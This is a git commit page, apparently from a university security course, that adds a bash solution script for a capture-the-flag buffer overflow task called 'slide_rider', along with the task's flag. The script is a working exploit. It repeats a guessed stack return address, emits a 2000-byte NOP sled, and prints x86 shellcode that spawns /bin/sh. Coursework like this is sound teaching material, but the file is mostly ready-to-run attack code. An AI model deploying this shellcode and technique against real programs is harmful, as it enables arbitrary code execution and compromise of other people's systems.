[Assignment-6] solution task 6 (nop sliding)
All checks were successful
Latex Build / build-latex (Assignment 4 - Protokollsicherheit (Praxis)) (push) Successful in 1m4s
Latex Build / build-latex (Assignment 5 - Software Security - Teil 1) (push) Successful in 1m3s
Latex Build / build-latex (Assignment 4 - Protokollsicherheit (Praxis)) (pull_request) Successful in 34s
Latex Build / build-latex (Assignment 5 - Software Security - Teil 1) (pull_request) Successful in 9s
All checks were successful
Latex Build / build-latex (Assignment 4 - Protokollsicherheit (Praxis)) (push) Successful in 1m4s
Latex Build / build-latex (Assignment 5 - Software Security - Teil 1) (push) Successful in 1m3s
Latex Build / build-latex (Assignment 4 - Protokollsicherheit (Praxis)) (pull_request) Successful in 34s
Latex Build / build-latex (Assignment 5 - Software Security - Teil 1) (pull_request) Successful in 9s
This commit is contained in:
parent
c609af3329
commit
cf06a6813e
1 changed files with 16 additions and 0 deletions
16
Assignment 6 - Software Security - Teil 2/slide_rider/solution.sh
Executable file
16
Assignment 6 - Software Security - Teil 2/slide_rider/solution.sh
Executable file
|
@ -0,0 +1,16 @@
|
|||
#!/bin/bash
|
||||
|
||||
# sources: https://hg8.sh/posts/binary-exploitation/buffer-overflow-code-execution-by-shellcode-injection/
|
||||
|
||||
# flag{THEY_SEE_ME_SLIDIN_THEY_HATIN}
|
||||
|
||||
######### Exploit #########
|
||||
# Step 1: Fill the buffer with a candidate return address
|
||||
printf "\x0c\xd6\xff\xff%.0s" {1..30}
|
||||
|
||||
# Step 2: Write a lot of NOPs to stdout as a slide for the shellcode
|
||||
printf "\x90%.0s" {1..2000}
|
||||
|
||||
# Step 3: Write the provided shellcode to stdout
|
||||
printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
|
||||
###########################
|
Loading…
Reference in a new issue